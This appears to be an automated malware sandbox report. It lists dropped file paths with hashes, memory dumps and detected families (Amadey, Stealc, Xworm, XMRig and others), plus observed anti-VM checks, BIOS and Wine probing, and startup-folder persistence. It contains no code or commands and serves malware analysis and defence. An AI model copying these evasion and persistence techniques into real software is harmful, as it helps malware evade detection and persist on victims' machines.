SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/2352-543-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 9dc7f05134ea58b5e327e653607f35a1
SHA1 fd7cf07194cbc4c11702da74244775295669bede
SHA256 d0cc6fce653a2c1351e50c1730aaa61d132a6562de3efa382a94ec1dc0c0502b
SHA512 40eb82a56188d0caafd57ccbe891c19b3085ea5c33a8a4045d56570279a007a164a22ac195d3bdebc7c66ed70bba7bb8fda320926d318dc71210dbf11421d17d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 25593dad9a83536ef6becca2312ba023
SHA1 15a05338ad035f96d9f0b6b9d356e5ddbcbd8537
SHA256 a8518ebaee54f62745047f953c5d118b875bbdc72ebe10d3bc6c91eec0a35e57
SHA512 5b74e3d0036384872af7309c136150230d86aaf1a65c8a9193ba3e2f8ffbc01fd6f9bf1d63dbfee74c038c9b51b76bfd74f01a90f520a2b0a8c872126d90dba9

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 fc50585b0063e57b067bc2eccfdc7b1c
SHA1 37a3062d353214d44ecb9f1cdb6018395c929d25
SHA256 0fdc23e93b8ca26bc3b3ea26d882dde25f8ca2a9efae3b33b75ff16b9e5abc3e
SHA512 5680fdf83b422c9874b7900a6e24164f579456b2bd52d7e6ddd6d26dcbd51c9490393ae54904d6d25302e41a0095da61ab905a2f094e0158b1cddc8eb4182bde

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/2352-650-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\ProgramData\50E370761CD6C8DF.dat

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

memory/2460-678-0x0000000000CB0000-0x0000000001151000-memory.dmp

memory/2352-679-0x00000000000A0000-0x000000000055F000-memory.dmp

memory/2352-684-0x00000000000A0000-0x000000000055F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe

MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

memory/4044-762-0x000000013F990000-0x0000000140FDB000-memory.dmp

memory/3644-823-0x000000013F120000-0x000000013FCC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/3448-836-0x0000000001100000-0x0000000001160000-memory.dmp

memory/3548-856-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-854-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/3548-852-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-850-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-848-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-846-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-844-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-842-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-840-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3548-838-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/3864-867-0x0000000001220000-0x0000000001232000-memory.dmp

memory/3864-868-0x00000000004D0000-0x00000000004E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/3672-881-0x00000000012D0000-0x0000000001340000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108030101\v6Oqdnc.exe

MD5 d0a56cd33f4917ccce9660312f2e2f45
SHA1 c0948cb562f3a62b430789a5520475a624675680
SHA256 d7bd83b880b413926f9487c9b6e295fd5cdd71b88e2988998d29016a5377e9bb
SHA512 c835272405aed024d683f6e883672a37bdba2ba04b9063afbf2e1eae10980f952ff7171e123b3eda1fcc11f1b0336df03d717a29c8c168ab848d03fb712d1836

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 23:34

Reported

2025-03-05 23:37

Platform

win10v2004-20250217-en

Max time kernel

119s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\gmwu\wtrpqgw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\ProgramData\gmwu\wtrpqgw.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
